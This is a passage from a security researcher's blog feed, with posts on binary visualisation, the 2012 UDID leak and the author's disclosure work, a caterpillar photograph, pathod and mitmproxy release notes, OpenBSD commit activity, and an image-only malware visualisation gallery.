makes it possible, for instance, to quickly identify different malware packers
just based on their layout characteristics.</p>
<p>An obvious next step is to ask if it's possible to extend this idea to let us
visually compare binaries, creating a sort of visual diff. Unfortunately, we now
bump our heads against the limitations of space-filling curve visualization. I
made the animation below after a recent conversation along these lines, and I
think it illustrates the main issues nicely. It shows a single contiguous
stretch of data (the black area) being shifted progressively through a binary.
At each timestep, the only thing that changes is the starting location of the
data block:</p>
<div class="media">
<a href="hilbertsnake.gif">
<img src="hilbertsnake.gif" />
</a>
</div>
<p>Two things are immediately clear:</p>
<ul>
<li>The block of data doesn't retain its
shape at different offsets - identical stretches of data can look totally
different depending on their locations.</li>
<li>There's no way to quickly see
<em>where</em> in the binary a piece of information lies. Unless you are very familiar
with the particular curve and know its exact orientation, you can't say, for
instance, when the data block lies a third of the way through the binary.</li>
</ul>
<p>It's often worthwhile to trade off these things for locality preservation, but
it definitely scotches certain use cases. I do wonder if it might be possible to
tune the trade-off somewhat - sacrificing some locality preservation for better
shape retention and offset estimation. I've toyed with some ideas along these
lines (see the unrolled layouts in the <a href="https://corte.si/posts/visualisation/binvis/">binary visualization
post</a>), but I still don't have a
satisfying solution. If anyone out there knows of one, drop me a line.</p>
Findng the UDID leak: a guessing game
2012-09-07T00:00:00+00:00
2012-09-07T00:00:00+00:00
https://corte.si/posts/security/udid-leak-guessing/
<p>It's become quite a popular parlor game to guess who is responsible for the
recent Antisec UDID leak. I've now seen no less than six separate apps named as
the probable source (two of which came from <a href="http://www.marco.org">Marco
Arment</a>). Before we pick the next culprit, I think it's
worth taking a step back to consider the list of things we <em>don't</em> know:</p>
<ul>
<li>We don't know that we're dealing with just one source. The Antisec dump may
well be an amalgam of data from various sources.</li>
<li>We don't know that we're looking for just one app, or even a set of apps by
one developer. The leak may well come from one of the myriad of 3rd party services
which could be included in thousands of apps.</li>
<li>We don't know that Antisec is being truthful about the scale of the database,
or the additional data they claim is associated with the UDID/APNS records.</li>
<li>We certainly don't know that the data was filched from an FBI laptop or that
the NCFTA was in any way involved.</li>
</ul>
<p>Given all of these unknowns, I think a simple process-of-elimination approach to
tracking down the leak will probably be fruitless, or worse, result in the
finger being pointed at even more innocent parties. The one entity that may
already have the answer to this question is Apple. They have a list of a million
affected UDIDs, and they presumably have records of all apps that have ever used
the associated push tokens. Given a large and precise sample like this, it
should be possible to find the origin(s) of the leak reasonably easily. Indeed,
if Apple is on the ball they may already have done this.</p>
<p>Now for some frank speculation of my own. Let's assume for a moment that Antisec
has been entirely truthful about the data, and that we're dealing with a single
source. In that case, we're looking for:</p>
<ul>
<li>... an app or third-party service integrated into multiple apps</li>
<li>... with 12 million or more users</li>
<li>... that is APNS-enabled</li>
<li>... which also gathers user data like real names and zip codes.</li>
</ul>
<p>I'll throw my hat in the ring and say that my money is on a third-party service,
not a single app. If my hunch is right, the list of possible culprits is
actually rather short.</p>
The UDID leak is a privacy catastrophe
2012-09-04T00:00:00+00:00
2012-09-04T00:00:00+00:00
https://corte.si/posts/security/udid-leak/
<p>Something I've been worrying about for a long time has just happened: <a href="http://pastebin.com/nfVT7b0Z">Antisec
has leaked a database with more than a million
UDIDs</a>. The UDID issue has been a bit of a white
whale of mine - I've written many blog posts about it and spent more hours than
I care to think negotiating responsible disclosure with companies misusing
UDIDs. Let's recap some of the posts I've written about this:</p>
<ul>
<li><a href="http://corte.si/posts/security/openfeint-udid-deanonymization/index.html">In May 2011</a>,
just before its sale to Gree was announced, I showed that
<a href="http://en.wikipedia.org/wiki/OpenFeint">OpenFeint</a> was misusing UDIDs in a way
that allowed you to link a UDID to a user's identity, geolocation and Facebook
and Twitter accounts. I didn't discuss it openly at the time, you could also
completely take over an OpenFeint account, and access chat, forums, friends
lists, and more using just a UDID. This resulted in a class-action lawsuit
against OpenFeint, which has since petered out.</li>
<li><a href="http://corte.si/posts/security/apple-udid-survey/index.html">Later that month</a>, I
published a survey looking at how UDIDs are used in practice.
The data is now slightly out of date, but shows just how widely UDIDs are used and misused.</li>
<li><a href="http://corte.si/posts/security/udid-must-die/index.html">In September 2011</a>,
I published the most troubling news so far, which
paradoxically also got the least coverage in the press. I looked at
<em>all</em> the gaming social networks on IOS - basically OpenFeint and its
competitors - and found catastrophic mismanagement by nearly everyone. The
vulnerabilities ranged from de-anonymization, to takeover of the user's gaming
social network account, to the ability to completely take over the user's
Facebook and Twitter accounts using just a UDID.</li>
</ul>
<p>As serious these problems are, I'm afraid it's just the tip of the iceberg.
Negotiating disclosure and trying to convince companies to fix their problems
has taken literally months of my time, so I've stopped publishing on this issue
for the moment. It's disheartening to say it, but some of the companies
mentioned in my posts <em>still</em> have unfixed problems (they were all notified well
in advance of any publication). I will also note ominously that I know of a
number of similar vulnerabilities elsewhere in the IOS app ecosystem that I've
just not had the time to pursue.</p>
<p>When speaking to people about this, I've often been asked "What's the worst
that can happen?". My response was always that the worst case scenario would be
if a large database of UDIDs leaked... and here we are.</p>
Defiler
2012-08-26T00:00:00+00:00
2012-08-26T00:00:00+00:00
https://corte.si/posts/photos/lymantriid/
<p>I've been living out of a bag for the last 3 weeks, working hard on a series of
intense but fun audits. After running in high gear for a while I find that I
need a mental palate cleanser - something to help me refocus and stop me from
getting snowblind. I then grab my camera, strap on my macro rig, and walk out
the door to try to catch the local wildlife in the act. It's become a bit of a
game - the aim is to catch creatures in their natural setting and leave them
completely undisturbed when I go, with no posing, prodding or other
disturbances. Getting a usable shot of a 5mm target sitting on a twig swaying in
the wind is a fun challenge.</p>
<p>Today I find myself in Sydney, working in a part of the town that is shot
through with unreasonably beautiful walking tracks. The place is also blessed
with a huge diversity of invertebrate life that makes my <a href="http://en.wikipedia.org/wiki/Dunedin">adopted home
town</a> seem barren by comparison. I walked
along a nearby track until I found a quiet, leafy spot, geared up, and
leopard-crawled through the underbrush. Not long after, I came face-to-face with
this imposing little chap sitting on the tip of a fern frond.</p>
<div class="media">
<a href="./lymantriid2.jpg">
<img src="./lymantriid2.jpg" />
</a>
</div>
<p>This is a <a href="http://en.wikipedia.org/wiki/Lymantriidae">Lymantriid</a> caterpillar
of some variety, probably one of the tussock moths native to Australia.
"Lymantria" means "defiler" - some species of this family can cause huge damage
to foliage, and are considered to be destructive pests. So much so, that when a
single male <a href="http://en.wikipedia.org/wiki/Gypsy_moth">Gypsy Moth</a> (Lymantria
dispar) was discovered in Hamilton, New Zealand, they sprayed the entire city
with a caterpillar-specific <a href="http://www.biosecurity.govt.nz/pests-diseases/forests/gypsy-moth/residents/foray.htm">bacterial
insecticide</a>.</p>
<p>No need for drastic measures with this particular fellow, though - he's native
to this ecosystem, and the only pest is me and my camera. He was head down
munching away when I found him, and paid absolutely no attention to me when I
moved in close to get these shots. He's got reason to be cocksure, too - those
tufts of hair on his back contain hollow, poison-filled spines that can cause a
pretty unpleasant reaction when touched.</p>
<div class="media">
<a href="./lymantriid1.jpg">
<img src="./lymantriid1.jpg" />
</a>
</div>
<p>An few hours exploring and photographing is a very effective brain-cleaner,
leaving me ready to deal with spiny, venomous defilers of the digital variety.</p>
pathod 0.2: the daemon gets an evil twin
2012-08-22T00:00:00+00:00
2012-08-22T00:00:00+00:00
https://corte.si/posts/code/pathod/announce0_2/
<p>I've just pushed pathod 0.2 out the door. This is a huge release, with many new
features:</p>
<ul>
<li><a href="http://pathod.net/docs/pathoc">pathoc</a>, pathod's evil client-side twin.</li>
<li><a href="http://pathod.net/docs/test">libpathod.test</a>, a framework for using pathod in your unit tests.</li>
<li><a href="http://pathod.net/docs/language">Improved mini language</a>, including many new abilities and improvements.</li>
<li>A rewrite of the networking core.</li>
</ul>
<p>The project also has a new website at <a href="http://pathod.net">pathod.net</a>. Yes,
pathod is now self-hosting, so you can try out both pathod and pathoc
specifications right on the website. There's also a new <a href="http://public.pathod.net/200:b%22hello,%20sailor.%22">public pathod
instance</a>, which I'm sure
everyone will use entirely responsibly.</p>
Introducing pathod: a pathological HTTP server
2012-05-01T00:00:00+00:00
2012-05-01T00:00:00+00:00
https://corte.si/posts/code/pathod/announce0_1/
<p>I've just released <a href="http://cortesi.github.com/pathod%22">pathod</a>, a pathological
HTTP/S daemon useful for testing and torturing HTTP clients. At its core is a
tiny, terse language for crafting HTTP responses. It also has a built-in web
interface that lets you play with the response spec language, inspect logs, and
access pathod's full help document.</p>
<p>The rest of this post is a quick teaser showing some of pathod's abilities. See
the detailed documentation on the <a href="http://cortesi.github.com/pathod%22">pathod
site</a> if you want more.</p>
<h2 id="the-simplest-possible-response">The simplest possible response</h2>
<p>The easiest way to craft a response is to specify it directly in the request
URL. Lets start with the simplest possible example. Start pathod, and then visit
this URL:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">http://localhost:9999/p/200
</span></code></pre>
<p>The "/p/" path is the location of the response generator in pathod's default
configuration - everything after that a response specification in pathod's
mini-language. The general form of a response spec is as follows:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">code[MESSAGE]:[colon-separated list of features]
</span></code></pre>
<p>In this case, we're specifying only the HTTP response code - that is, an HTTP
200 OK with no headers and no content, resulting in a response like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">HTTP/1.1 200 OK
</span></code></pre><h2 id="specifying-features">Specifying features</h2>
<p>One example of a "feature" is a response header. Lets embellish our response by
adding one:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">200:h"Etag"="foo"
</span></code></pre>
<p>The first letter of the feature - "h", in this case - is a mnemonic indicating
the type of feature we're adding. The full response to this spec looks like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">HTTP/1.1 200 OK
Etag: foo
</span></code></pre>
<p>Both "Etag" and "foo" are Value Specifiers, a syntax used throughout the
response specification language. In this case they are literal values, as
indicated by the fact that they are quoted strings. The Value Specification
syntax also lets us load values from files or generate random data. For
instance, here is a specification that generates 100k of random binary data for
the header value:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">200:h"Etag"=@100k
</span></code></pre>
<p>Now, binary data in the header value will probably break things in interesting
ways, but is unlikely to be read by the client as a valid (but over-long)
value. To see if the client really drops off its perch if we feed it a single
100k header, we have to constrain the random data. Here's the same response,
but with data generated only from ASCII letters:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">200:h"Etag"=@100k,ascii_letters
</span></code></pre>
<p>pathod has a large number of built-in character classes from which random
data can be generated.</p>
<h2 id="pauses-and-disconnects">Pauses and Disconnects</h2>
<p>Next, we can disrupt the communications in various ways. At the moment, this
means adding pauses and disconnects to a response. Let's start with an HTTP 404
response with a body consisting of a 100k of random binary data:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">404:b@100k
</span></code></pre>
<p>Here's the same response, but with a 120 second pause after sending 100 bytes:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">404:b@100k:p120,100
</span></code></pre>
<p>And, the same response again, but with hard disconnect after sending 100 bytes:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">404:b@100k:d100
</span></code></pre>
<p>Instead of specifying a time explicitly, we can ask pathod to just randomly
disconnect at a time of its choosing:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">404:b@100k:dr
</span></code></pre>
<p>That's it for the teaser - hopefully it's enough to entice you into looking at
<a href="http://cortesi.github.com/pathod%22">pathod</a>'s full documentation.</p>
<h2 id="what-s-next">What's next?</h2>
<p>pathod is an "airport project" - the first draft was written in its
entirety during a 40-hour trip back home from New York (I drew a bad lot in
stopovers). I've now firmed it up a bit, but there's still work to be done. In
the next month, mitmproxy's test suite will move to pathod, after which
there will be a simple, well-documented way to unit test. I also plan to build
out the JSON API (which is used to drive pathod in test suites), and expand the
mini-language with convenient ways to generate pathological cookies,
authentication headers, SSL errors, and cache control.</p>
mitmproxy 0.8
2012-04-09T00:00:00+00:00
2012-04-09T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce0_8/
<div class="media">
<a href="mitmproxy_0_8.png">
<img src="mitmproxy_0_8.png" />
</a>
</div>
<p>I'm happy to announce the release of <a href="http://mitmproxy.org">mitmproxy 0.8</a>.
This release has a few major new features, big speedups, and many, many small
bugfixes and improvements. Here are the headlines:</p>
<h2 id="android-interception">Android interception</h2>
<p>The most prominent new feature is that we now have a supported way to intercept
Android traffic. What's more, we can do this without a cumbersome transparent
proxying rig - see the <a href="http://mitmproxy.org/doc/certinstall/android.html">Android section in the
documentation</a> for the
details. Special thanks goes to <a href="http://twitter.com/yjmbo">Jim Cheetham</a> for
lending me an Android device and helping to get this feature off the ground.</p>
<h2 id="replacement-patterns">Replacement patterns</h2>
<p>Another exceedingly useful new feature is <a href="http://mitmproxy.org/doc/replacements.html">replacement
patterns</a>. These consist of a
filter, a regular expression and a replacement string, and run continuously
while mitmproxy processes requests and responses. You can pass these either on
the command-line, or using a built-in replacement pattern editor.</p>
<div class="media">
<a href="mitmproxy0_8_replace.png">
<img src="mitmproxy0_8_replace.png" />
</a>
</div>
<p>I'm sure you can immediately think of many uses for this flexible feature, but
my favourite is to use it during testing as a way to conveniently inject
complicated exploits into web traffic. I do this by setting a replacement
pattern that swaps a short but likely unique string (say MYXSS) for a long
exploit, and then I use simple interaction and front-end tools like Firebug to
inject exploits into requests manually based on the short string marker.</p>
<h2 id="improved-pretty-printing-of-request-and-response-contents">Improved pretty-printing of request and response contents</h2>
<p>This release of mitmproxy has a completely redesigned subsystem for
pretty-printing request and response bodies. For instance, we now extract EXIF
tags and other basic information to give you something better than a hex dump
when looking at an image:</p>
<div class="media">
<a href="mitmproxy0_8-pretty.png">
<img src="mitmproxy0_8-pretty.png" />
</a>
</div>
<p>We also have much improved HTML indenting (using <a href="http://lxml.de/">lxml</a>), and
a built-in JavaScript beautifier (thanks to
<a href="http://jsbeautifier.org">JSBeautifier</a>) that teases out compressed and
obfuscated scripts into something readable.</p>
<h2 id="changelog">Changelog</h2>
<ul>
<li>Detailed tutorial for Android interception. Some features that land in
this release have finally made reliable Android interception possible.</li>
<li>Upstream-cert mode, which uses information from the upstream server to
generate interception certificates.</li>
<li>Replacement patterns that let you easily do global replacements in flows
matching filter patterns. Can be specified on the command-line, or edited
interactively.</li>
<li>Much more sophisticated and usable pretty printing of request bodies.
Support for auto-indentation of JavaScript, inspection of image EXIF
data, and more.</li>
<li>Details view for flows, showing connection and SSL cert information (X
keyboard shortcut).</li>
<li>Server certificates are now stored and serialized in saved traffic for
later analysis. This means that the 0.8 serialization format is NOT
compatible with 0.7.</li>
<li>Add a shortcut key ("f") to load the remainder of a request or response body,
if it is abbreviated.</li>
<li>Many other improvements, including bugfixes, and expanded scripting API,
and more sophisticated certificate handling.</li>
</ul>
mitmproxy 0.7
2012-02-27T00:00:00+00:00
2012-02-27T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce0_7/
<div class="media">
<a href="mitmproxy_0_7.png">
<img src="mitmproxy_0_7.png" />
</a>
</div>
<p>I'm happy to announce the release of <a href="http://mitmproxy.org">mitmproxy 0.7</a>. The
biggest visible change is a new structured editor for headers, query strings
and form fields. Other new feature include a reverse proxy mode, extended
script API that makes many common tasks much easier, and a myriad of
improvements to the interface (including a massive increase in speed).
Everybody still on 0.6 should upgrade - get it here:</p>
<h2 id="mitmproxy-0-7-tar-gz-docs"><a href="http://mitmproxy.org">mitmproxy-0.7.tar.gz</a> <a href="http://mitmproxy.org/docs">(docs)</a></h2>
<p>You can also now install mitmproxy using <a href="http://pypi.python.org/pypi/pip">pip</a>, like so:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;"> </span><span style="color:#bf616a;">pip</span><span style="color:#c0c5ce;"> install mitmproxy
</span></code></pre>
<p>In other news, the project has had an amazing month, after a rash of
high-profile results obtained using mitmproxy were published. It started with
<a href="http://mclov.in/2012/02/08/path-uploads-your-entire-address-book-to-their-servers.html">Arun Thampi's
discovery</a>
that Path uploads users' address books to their servers. Things snowballed from
there, and for a few days mitmproxy seemed to be everywhere. Similar findings
were made for
<a href="http://markchang.tumblr.com/post/17244167951/hipster-uploads-part-of-your-iphone-address-book-to-its">Hipster</a>,
<a href="http://www.theverge.com/2012/2/14/2798008/ios-apps-and-the-address-book-what-you-need-to-know">The
Verge</a>
did a mitmproxy-driven AddressbookGate expose (including vaguely threatening
background shots of mitmproxy doing its dastardly work), and lots of people said
nice things on Twitter.</p>
<p>To see the impact all of this for the mitmproxy project, you need only look at
the <a href="http://github.com/cortesi/mitmproxy">Github page</a> - watchers of the repo
went from about 200 a month a go, to 950 at the time of this post.</p>
<h2 id="changelog">Changelog</h2>
<ul>
<li>New built-in key/value editor. This lets you interactively edit URL query
strings, headers and URL-encoded form data.</li>
<li>Extend script API to allow duplication and replay of flows.</li>
<li>API for easy manipulation of URL-encoded forms and query strings.</li>
<li>Add "D" shortcut in mitmproxy to duplicate a flow.</li>
<li>Reverse proxy mode. In this mode mitmproxy acts as an HTTP server,
forwarding all traffic to a specified upstream server.</li>
<li>UI improvements - use Unicode characters to make GUI more compact,
improve spacing and layout throughout.</li>
<li>Add support for filtering by HTTP method.</li>
<li>Add the ability to specify an HTTP body size limit.</li>
<li>Move to typed netstrings for serialization format - this makes 0.7
backwards-incompatible with serialized data from 0.6!</li>
<li>Significant improvements in speed and responsiveness of UI.</li>
<li>Many minor bugfixes and improvements.</li>
</ul>
OpenBSD in decline?
2012-02-26T00:00:00+00:00
2012-02-26T00:00:00+00:00
https://corte.si/posts/security/openbsd-decline/
<p>My leisurely Sunday activity today is to set up a new
<a href="http://openbsd.org">OpenBSD</a> firewall for my mobile app testing lab. I haven't
done a from-scratch OpenBSD install for years, so I spent some time reading
through the change logs for the last few versions to catch up with what's
changed. Although the project is clearly still making steady, well-engineered
progress, I had the nagging feeling that the rate of change wasn't what it used
to be. So, I pulled some numbers from <a href="http://archives.neohapsis.com/archives/openbsd/cvs/">CVS commit message list
archives</a>, and graphed
them. Here are the number of commits per month from January 2001 to January
2012. The orange line is a simple 12-month moving average:</p>
<div class="media">
<a href="commitspermonth.png">
<img src="commitspermonth.png" />
</a>
</div>
<p>Now, we should be cautious about interpreting this - the number of commits
doesn't tell us anything about the quality, importance or magnitude of code
change. Even if it did all of these things, there are other and perhaps better
measures of a project's health. Still, the trend is clear, and suggests a
sustained decline in activity.</p>
<p>I just <a href="http://openbsd.org/orders.html">bought some T-shirts</a> to help support
one of my favourite open source projects. You should too.</p>
Malware
2012-01-05T00:00:00+00:00
2012-01-05T00:00:00+00:00
https://corte.si/posts/visualisation/malware/
<p><b>Edit: Since this post, I've created an interactive tool for binary
visualisation - see it at <a href="http://binvis.io">binvis.io</a></b></p>
<p>Hover and click for more.</p>
<style>
.malware {
}
.malware tr {
border: 0;
}
.malware td {
border: 0;
position: relative;
margin: 0 auto;
width: 128px;
height: 138px;
}
.malware td img {
position: absolute;
top:0;
left:0;
overflow: hidden;
height: 128px;
width: 128px;
}
.malware td .entropy {
z-index: 9999;
transition: opacity .3s linear;
cursor: pointer;
}
.malware td :hover > .entropy {
opacity: 0;
}
</style>
<table class="malware">
<tr>
<td>
<a href="0cc9e0ba6a0bd8b79aaf2be22c496228.html">
<img class="entropy" src='small_0cc9e0ba6a0bd8b79aaf2be22c496228_entropy.png'/>
<img class="charclass" src='small_0cc9e0ba6a0bd8b79aaf2be22c496228_charclass.png'/>
</a>
</td>
<td>
<a href="0dcfe476fbd68148f007e6c48c226e0f.html">
<img class="entropy" src='small_0dcfe476fbd68148f007e6c48c226e0f_entropy.png'/>
<img class="charclass" src='small_0dcfe476fbd68148f007e6c48c226e0f_charclass.png'/>
</a>
</td>
<td>
<a href="03b3f30aed5b7dc39bd6e356bbde3713.html">
<img class="entropy" src='small_03b3f30aed5b7dc39bd6e356bbde3713_entropy.png'/>
<img class="charclass" src='small_03b3f30aed5b7dc39bd6e356bbde3713_charclass.png'/>
</a>
</td>
<td>
<a href="131f1cb94df6e2969ac874503cbfd934.html">
<img class="entropy" src='small_131f1cb94df6e2969ac874503cbfd934_entropy.png'/>
<img class="charclass" src='small_131f1cb94df6e2969ac874503cbfd934_charclass.png'/>
</a>
</td>
<td>
<a href="038e3a7add116ac69e5f9539ce461386.html">
<img class="entropy" src='small_038e3a7add116ac69e5f9539ce461386_entropy.png'/>
<img class="charclass" src='small_038e3a7add116ac69e5f9539ce461386_charclass.png'/>
</a>
</td>
</tr><tr>
<td>
<a href="094fedd2e4c175cd81dc170fd4d03917.html">
<img class="entropy" src='small_094fedd2e4c175cd81dc170fd4d03917_entropy.png'/>
<img class="charclass" src='small_094fedd2e4c175cd81dc170fd4d03917_charclass.png'/>
</a>
</td>
<td>
<a href="1a30184661ee6585f4a188107e63a4d2.html">
<img class="entropy" src='small_1a30184661ee6585f4a188107e63a4d2_entropy.png'/>
<img class="charclass" src='small_1a30184661ee6585f4a188107e63a4d2_charclass.png'/>
</a>
</td>
<td>
<a href="1b5bad65f8b72a52cfcae67e3e538f34.html">
<img class="entropy" src='small_1b5bad65f8b72a52cfcae67e3e538f34_entropy.png'/>
<img class="charclass" src='small_1b5bad65f8b72a52cfcae67e3e538f34_charclass.png'/>
</a>
</td>
<td>
<a href="163524fb9a41e6ec79178a902797f8f1.html">
<img class="entropy" src='small_163524fb9a41e6ec79178a902797f8f1_entropy.png'/>
<img class="charclass" src='small_163524fb9a41e6ec79178a902797f8f1_charclass.png'/>
</a>
</td>
<td>
<a href="177827ae9615791e067b4a9fb4be1ab9.html">
<img class="entropy" src='small_177827ae9615791e067b4a9fb4be1ab9_entropy.png'/>
<img class="charclass" src='small_177827ae9615791e067b4a9fb4be1ab9_charclass.png'/>
</a>
</td>
</tr><tr>
<td>
<a href="1b0e377994cfdb4eec0d2fb028118844.html">
<img class="entropy" src='small_1b0e377994cfdb4eec0d2fb028118844_entropy.png'/>
<img class="charclass" src='small_1b0e377994cfdb4eec0d2fb028118844_charclass.png'/>
</a>
</td>
<td>
<a href="0b4f82e83741e79310d797d54db5a9be.html">
<img class="entropy" src='small_0b4f82e83741e79310d797d54db5a9be_entropy.png'/>
<img class="charclass" src='small_0b4f82e83741e79310d797d54db5a9be_charclass.png'/>
</a>
</td>
<td>
<a href="14e6950dd4bcffe54bf158a20437e6b4.html">
<img class="entropy" src='small_14e6950dd4bcffe54bf158a20437e6b4_entropy.png'/>
<img class="charclass" src='small_14e6950dd4bcffe54bf158a20437e6b4_charclass.png'/>
</a>
</td>
<td>
<a href="1998bb714c0de980635ee9b8c1951381.html">
<img class="entropy" src='small_1998bb714c0de980635ee9b8c1951381_entropy.png'/>
<img class="charclass" src='small_1998bb714c0de980635ee9b8c1951381_charclass.png'/>
</a>
</td>
<td>
<a href="023293a96c763bbdee3991994cdcdcef.html">
<img class="entropy" src='small_023293a96c763bbdee3991994cdcdcef_entropy.png'/>
<img class="charclass" src='small_023293a96c763bbdee3991994cdcdcef_charclass.png'/>
</a>
</td>
</tr><tr>
<td>
<a href="14064e26cbd3daed7e6eb3b4fb245c8f.html">
<img class="entropy" src='small_14064e26cbd3daed7e6eb3b4fb245c8f_entropy.png'/>
<img class="charclass" src='small_14064e26cbd3daed7e6eb3b4fb245c8f_charclass.png'/>
</a>
</td>
<td>
<a href="1511f2d75e07bb94f5da8cbc031a51dd.html">
<img class="entropy" src='small_1511f2d75e07bb94f5da8cbc031a51dd_entropy.png'/>
<img class="charclass" src='small_1511f2d75e07bb94f5da8cbc031a51dd_charclass.png'/>
</a>
</td>
<td>
<a href="14560f7dc19e6fef87743f83e5234519.html">
<img class="entropy" src='small_14560f7dc19e6fef87743f83e5234519_entropy.png'/>
<img class="charclass" src='small_14560f7dc19e6fef87743f83e5234519_charclass.png'/>
</a>
</td>
<td>
<a href="00f29767bee5f8bd5b2d55d5be734f69.html">
<img class="entropy" src='small_00f29767bee5f8bd5b2d55d5be734f69_entropy.png'/>
<img class="charclass" src='small_00f29767bee5f8bd5b2d55d5be734f69_charclass.png'/>
</a>
</td>
<td>
<a href="05fd535d70dfb5ee4f36e87e39d8c70d.html">
<img class="entropy" src='small_05fd535d70dfb5ee4f36e87e39d8c70d_entropy.png'/>
<img class="charclass" src='small_05fd535d70dfb5ee4f36e87e39d8c70d_charclass.png'/>
</a>
</td>
</tr><tr>
<td>
<a href="109f8c72ff91dee5906aba0e47324526.html">
<img class="entropy" src='small_109f8c72ff91dee5906aba0e47324526_entropy.png'/>
<img class="charclass" src='small_109f8c72ff91dee5906aba0e47324526_charclass.png'/>
</a>
</td>
<td>
<a href="1aa40b6ea4e7be64d4e6a024fcdf76fe.html">
<img class="entropy" src='small_1aa40b6ea4e7be64d4e6a024fcdf76fe_entropy.png'/>
<img class="charclass" src='small_1aa40b6ea4e7be64d4e6a024fcdf76fe_charclass.png'/>
</a>
</td>
<td>
<a href="1a3aa70d060be5e6e778e3519b400bf1.html">
<img class="entropy" src='small_1a3aa70d060be5e6e778e3519b400bf1_entropy.png'/>
<img class="charclass" src='small_1a3aa70d060be5e6e778e3519b400bf1_charclass.png'/>
</a>
</td>
<td>
<a href="08b983ec55bfd50d1d2cb9a90b1ae54e.html">
<img class="entropy" src='small_08b983ec55bfd50d1d2cb9a90b1ae54e_entropy.png'/>
<img class="charclass" src='small_08b983ec55bfd50d1d2cb9a90b1ae54e_charclass.png'/>
</a>
</td>
<td>
<a href="04240e137999dc6b5115de8db3a15f53.html">
<img class="entropy" src='small_04240e137999dc6b5115de8db3a15f53_entropy.png'/>
<img class="charclass" src='small_04240e137999dc6b5115de8db3a15f53_charclass.png'/>
</a>
</td>
</tr><tr>
<td>
<a href="08c926bf7fbb3397236effef1b30b4df.html">
<img class="entropy" src='small_08c926bf7fbb3397236effef1b30b4df_entropy.png'/>
<img class="charclass" src='small_08c926bf7fbb3397236effef1b30b4df_charclass.png'/>
</a>
</td>
<td>
<a href="09dd27fcccb9c000d37c6394364be1b5.html">
<img class="entropy" src='small_09dd27fcccb9c000d37c6394364be1b5_entropy.png'/>
<img class="charclass" src='small_09dd27fcccb9c000d37c6394364be1b5_charclass.png'/>
</a>
</td>
<td>
<a href="0bcee1314e8c61fa8ef55743f3bb7742.html">
<img class="entropy" src='small_0bcee1314e8c61fa8ef55743f3bb7742_entropy.png'/>
<img class="charclass" src='small_0bcee1314e8c61fa8ef55743f3bb7742_charclass.png'/>
</a>
</td>
<td>
<a href="0e2bf707dbc146c9d60c373237d050b7.html">
<img class="entropy" src='small_0e2bf707dbc146c9d60c373237d050b7_entropy.png'/>
<img class="charclass" src='small_0e2bf707dbc146c9d60c373237d050b7_charclass.png'/>
</a>
</td>
<td>
<a href="0309fc0e6dbeb714c5361f82b2ccb037.html">
<img class="entropy" src='small_0309fc0e6dbeb714c5361f82b2ccb037_entropy.png'/>
<img class="charclass" src='small_0309fc0e6dbeb714c5361f82b2ccb037_charclass.png'/>
</a>
</td>
</tr><tr>
<td>
<a href="0ff25e3cefcce4336d0abeb9f02ccb02.html">
<img class="entropy" src='small_0ff25e3cefcce4336d0abeb9f02ccb02_entropy.png'/>
<img class="charclass" src='small_0ff25e3cefcce4336d0abeb9f02ccb02_charclass.png'/>
</a>
</td>
<td>
<a href="19bc481e5cb1113c7eff49b67273f892.html">
<img class="entropy" src='small_19bc481e5cb1113c7eff49b67273f892_entropy.png'/>
<img class="charclass" src='small_19bc481e5cb1113c7eff49b67273f892_charclass.png'/>
</a>
</td>
<td>
<a href="1a8700c754f97c115fa91fa161fa05cc.html">
<img class="entropy" src='small_1a8700c754f97c115fa91fa161fa05cc_entropy.png'/>
<img class="charclass" src='small_1a8700c754f97c115fa91fa161fa05cc_charclass.png'/>
</a>
</td>
<td>
<a href="12e9e61357be212f28ea4c81ef75018d.html">
<img class="entropy" src='small_12e9e61357be212f28ea4c81ef75018d_entropy.png'/>
<img class="charclass" src='small_12e9e61357be212f28ea4c81ef75018d_charclass.png'/>
</a>
</td>
<td>
<a href="01310712a180d9f939c126712d24363d.html">
<img class="entropy" src='small_01310712a180d9f939c126712d24363d_entropy.png'/>
<img class="charclass" src='small_01310712a180d9f939c126712d24363d_charclass.png'/>
</a>
</td>
</tr><tr>
<td>
<a href="1542a2f2732bbdad500bf112686503ac.html">
<img class="entropy" src='small_1542a2f2732bbdad500bf112686503ac_entropy.png'/>
<img class="charclass" src='small_1542a2f2732bbdad500bf112686503ac_charclass.png'/>
</a>
</td>
<td>
<a href="096381c0f5ddc29319ba2b2647cea116.html">
<img class="entropy" src='small_096381c0f5ddc29319ba2b2647cea116_entropy.png'/>
<img class="charclass" src='small_096381c0f5ddc29319ba2b2647cea116_charclass.png'/>
</a>
</td>
<td>
<a href="17fd97da6d93430ec0d9aa040b4b2c58.html">
<img class="entropy" src='small_17fd97da6d93430ec0d9aa040b4b2c58_entropy.png'/>
<img class="charclass" src='small_17fd97da6d93430ec0d9aa040b4b2c58_charclass.png'/>
</a>
</td>
<td>
<a href="0d9109ab6b06f38221b713eb6a54c42f.html">
<img class="entropy" src='small_0d9109ab6b06f38221b713eb6a54c42f_entropy.png'/>
<img class="charclass" src='small_0d9109ab6b06f38221b713eb6a54c42f_charclass.png'/>
</a>
</td>
<td>
<a href="18ce863d41622cd7aaa3c7d3d11e2f3e.html">
<img class="entropy" src='small_18ce863d41622cd7aaa3c7d3d11e2f3e_entropy.png'/>
<img class="charclass" src='small_18ce863d41622cd7aaa3c7d3d11e2f3e_charclass.png'/>
</a>
</td>
</tr><tr>
<td>
<a href="0f5c70c82a74c8ff3d05fbf4d90bc5bf.html">
<img class="entropy" src='small_0f5c70c82a74c8ff3d05fbf4d90bc5bf_entropy.png'/>
<img class="charclass" src='small_0f5c70c82a74c8ff3d05fbf4d90bc5bf_charclass.png'/>
</a>
</td>
<td>
